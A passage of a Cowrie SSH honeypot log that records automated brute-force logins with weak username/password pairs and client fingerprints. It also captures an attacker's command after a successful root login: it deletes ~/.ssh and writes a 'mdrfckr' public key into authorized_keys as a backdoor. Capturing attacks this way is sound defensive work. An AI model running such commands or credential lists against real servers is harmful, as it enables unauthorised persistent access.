-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:14:28.591259Z","src_ip":"212.227.235.229","session":"379e34bfbb44"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T10:14:28.974421Z","src_ip":"212.227.235.229","session":"379e34bfbb44"}
{"eventid":"cowrie.login.failed","username":"suraj","password":"1234","message":"login attempt [suraj/1234] failed","sensor":"my-vps","timestamp":"2025-09-09T10:14:29.004598Z","src_ip":"212.227.235.229","session":"d5747c1f7fa7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:14:30.073816Z","src_ip":"212.227.235.229","session":"379e34bfbb44"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:14:30.265904Z","src_ip":"212.227.235.229","session":"d5747c1f7fa7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43610,"dst_ip":"1.2.3.4","dst_port":22,"session":"239c957458aa","protocol":"ssh","message":"New connection: 212.227.125.160:43610 (1.2.3.4:22) [session: 239c957458aa]","sensor":"my-vps","timestamp":"2025-09-09T10:14:32.094458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T10:14:32.098528Z","src_ip":"212.227.125.160","session":"239c957458aa"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-09T10:14:32.158232Z","src_ip":"212.227.125.160","session":"239c957458aa"}
{"eventid":"cowrie.login.failed","username":"hms","password":"hms","message":"login attempt [hms/hms] failed","sensor":"my-vps","timestamp":"2025-09-09T10:14:32.357928Z","src_ip":"212.227.125.160","session":"239c957458aa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:14:33.438395Z","src_ip":"212.227.125.160","session":"239c957458aa"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52328,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dad3a83d704","protocol":"ssh","message":"New connection: 217.72.205.35:52328 (1.2.3.4:22) [session: 1dad3a83d704]","sensor":"my-vps","timestamp":"2025-09-09T10:15:25.734797Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:25.743354Z","src_ip":"217.72.205.35","session":"1dad3a83d704"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35730,"dst_ip":"1.2.3.4","dst_port":22,"session":"d40392cc2de1","protocol":"ssh","message":"New connection: 212.227.235.229:35730 (1.2.3.4:22) [session: d40392cc2de1]","sensor":"my-vps","timestamp":"2025-09-09T10:15:29.928833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:15:29.933540Z","src_ip":"212.227.235.229","session":"d40392cc2de1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:15:30.029984Z","src_ip":"212.227.235.229","session":"d40392cc2de1"}
{"eventid":"cowrie.login.failed","username":"sales","password":"111111","message":"login attempt [sales/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T10:15:30.466864Z","src_ip":"212.227.235.229","session":"d40392cc2de1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:31.574309Z","src_ip":"212.227.235.229","session":"d40392cc2de1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48458,"dst_ip":"1.2.3.4","dst_port":22,"session":"6560e65a9572","protocol":"ssh","message":"New connection: 212.227.235.229:48458 (1.2.3.4:22) [session: 6560e65a9572]","sensor":"my-vps","timestamp":"2025-09-09T10:15:48.240152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:15:48.245977Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:15:48.507982Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.login.success","username":"root","password":"Password2025","message":"login attempt [root/Password2025] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:15:49.597293Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:15:50.176896Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:15:50.179207Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:15:50.181656Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:50.446912Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:15:50.980299Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:15:50.983012Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:15:51.247860Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:51.249064Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49724,"dst_ip":"1.2.3.4","dst_port":22,"session":"78fc786f94fc","protocol":"ssh","message":"New connection: 212.227.235.229:49724 (1.2.3.4:22) [session: 78fc786f94fc]","sensor":"my-vps","timestamp":"2025-09-09T10:15:51.502349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:15:51.503932Z","src_ip":"212.227.235.229","session":"78fc786f94fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:15:51.758886Z","src_ip":"212.227.235.229","session":"78fc786f94fc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:15:52.796382Z","src_ip":"212.227.235.229","session":"78fc786f94fc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:54.055351Z","src_ip":"212.227.235.229","session":"78fc786f94fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50730,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c54847008d9","protocol":"ssh","message":"New connection: 212.227.235.229:50730 (1.2.3.4:22) [session: 2c54847008d9]","sensor":"my-vps","timestamp":"2025-09-09T10:15:54.311403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:15:54.313218Z","src_ip":"212.227.235.229","session":"2c54847008d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:15:54.571461Z","src_ip":"212.227.235.229","session":"2c54847008d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:15:55.602463Z","src_ip":"212.227.235.229","session":"2c54847008d9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:55.865005Z","src_ip":"212.227.235.229","session":"2c54847008d9"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:15:55.866413Z","src_ip":"212.227.235.229","session":"6560e65a9572"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35740,"dst_ip":"1.2.3.4","dst_port":22,"session":"91eedf3120f1","protocol":"ssh","message":"New connection: 212.227.235.229:35740 (1.2.3.4:22) [session: 91eedf3120f1]","sensor":"my-vps","timestamp":"2025-09-09T10:16:30.061353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:16:30.069354Z","src_ip":"212.227.235.229","session":"91eedf3120f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:16:30.166132Z","src_ip":"212.227.235.229","session":"91eedf3120f1"}
{"eventid":"cowrie.login.failed","username":"webapp","password":"webapp1234","message":"login attempt [webapp/webapp1234] failed","sensor":"my-vps","timestamp":"2025-09-09T10:16:30.610219Z","src_ip":"212.227.235.229","session":"91eedf3120f1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:16:31.709670Z","src_ip":"212.227.235.229","session":"91eedf3120f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46892,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb6d10dfb8cb","protocol":"ssh","message":"New connection: 212.227.235.229:46892 (1.2.3.4:22) [session: fb6d10dfb8cb]","sensor":"my-vps","timestamp":"2025-09-09T10:17:13.093190Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:17:13.097797Z","src_ip":"212.227.235.229","session":"fb6d10dfb8cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:17:13.365323Z","src_ip":"212.227.235.229","session":"fb6d10dfb8cb"}
{"eventid":"cowrie.login.failed","username":"ctf","password":"1","message":"login attempt [ctf/1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:17:14.463293Z","src_ip":"212.227.235.229","session":"fb6d10dfb8cb"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:17:15.730456Z","src_ip":"212.227.235.229","session":"fb6d10dfb8cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35746,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f185117fe39","protocol":"ssh","message":"New connection: 212.227.235.229:35746 (1.2.3.4:22) [session: 6f185117fe39]","sensor":"my-vps","timestamp":"2025-09-09T10:17:32.730719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:17:32.735916Z","src_ip":"212.227.235.229","session":"6f185117fe39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:17:32.831241Z","src_ip":"212.227.235.229","session":"6f185117fe39"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"12345678","message":"login attempt [muhammad/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T10:17:33.268679Z","src_ip":"212.227.235.229","session":"6f185117fe39"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:17:34.368587Z","src_ip":"212.227.235.229","session":"6f185117fe39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60798,"dst_ip":"1.2.3.4","dst_port":22,"session":"1584c01d30a5","protocol":"ssh","message":"New connection: 212.227.235.229:60798 (1.2.3.4:22) [session: 1584c01d30a5]","sensor":"my-vps","timestamp":"2025-09-09T10:18:33.088928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-09T10:18:33.274872Z","src_ip":"212.227.235.229","session":"1584c01d30a5"}
